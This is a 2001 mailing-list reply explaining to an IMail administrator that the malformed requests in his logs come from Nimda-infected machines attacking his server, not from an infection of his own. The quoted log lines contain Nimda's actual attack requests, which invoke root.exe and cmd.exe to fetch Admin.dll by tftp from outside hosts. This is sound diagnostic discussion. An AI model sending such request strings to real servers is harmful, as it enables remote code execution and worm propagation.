> We started seeing problems on Tuesday like everyone else, but we are
> running IMail on a server by itself... No IIS. I am seeing a lot of
> malformed header requests in the logs like the Code Red I & II virus does
> to IIS servers ...
>20010918 111401 208.180.242.21, , , GET
>/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll
>HTTP/1.0
This is from the Nimda virus. Computers that get infected with it will
connect to pseudo-random IPs, and if there is a web server on them, will
try a dozen different IIS hacks. The fact that you are not running IIS
doesn't make a difference; Nimda doesn't care about wasting bandwidth and
other resources just because you aren't running IIS.
>and -- this is the odd part -- some BRO*.tmp files in my spool directory
>that are most definitely being caused by people browsing WebMail.
That's normal. IMail will create those files for web requests, such as the
ones that Nimda is making.
> It is causing web messaging to crawl, but other than that I have not
> seen what everyone else seems to be seeing with the Nimda virus. No other
> characteristics of the Nimda virus at all. I honestly do not believe that
> we have been infected...
You are not infected, you are just being attacked by other servers that are
infected.
>20010918 111401 208.180.242.21, , , GET
>/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll
>HTTP/1.0
>20010918 111401 208.234.121.72, , , GET
>/MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll
> HTTP/1.0
>20010918 111401 205.218.122.146, , , GET
>/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll
>
>
Note that these are all coming from different IP addresses. It's not
because of a problem with your server.
> When I called the other day the assumption was that it was the Nimda
> virus and the Ipswitch support guys said to run a virus program and
> reload the web template files to fix it and that has done nothing at all
> to help.
Ipswitch does seem to be pretty clueless about viruses (but, that's OK,
since they aren't in the AV business). They don't seem to realize that few
(if any) viruses attack try to break back into the same machine they are
running on.
> I even went ahead and made the upgrade from 6.06 to v.7.03 Wednesday
> night and no progress.
That won't do any good. That's like buying a new telephone to try to get
rid of crank calls.
> I have all of the virus definitions for Norton and I've done SEVERAL
> system scans with Norton, House Call and the FIX_NIMDA.EXE program from
> Trend Micro and all came up empty handed. I just can't believe that the
> Nimda has gotten into our system...
It hasn't. You're just getting hit from other servers.
>Is anyone else seeing these BRO*.tmp files or is it just me?
Yes, anyone running IMail's web server on port 80 will see a large increase
in those files when Nimda-infected computers connect to theirs.
> This seems to be a problem specific to IMail's Web Messaging program
> not properly filtering out these malformed request.
No, it is simply sending the logon page that it is designed to return when
a bad URL is given.
>When Web Messaging is off, the server runs like a dream. It is one thing
>to patch an IIS server with a patch from the product vendor, but I
>honestly don't have a clue as to what else I can do to stop this DoS
>attack from happening on my IMail box without implementing a firewall
>system for that server.
That's what you have to do. No software can prevent a DoS attack that is
simply flooding the server with requests.
-Scott
---
Declude: Anti-virus, Anti-spam and Anti-hijacking solutions for
IMail. http://www.declude.com
Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.
An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
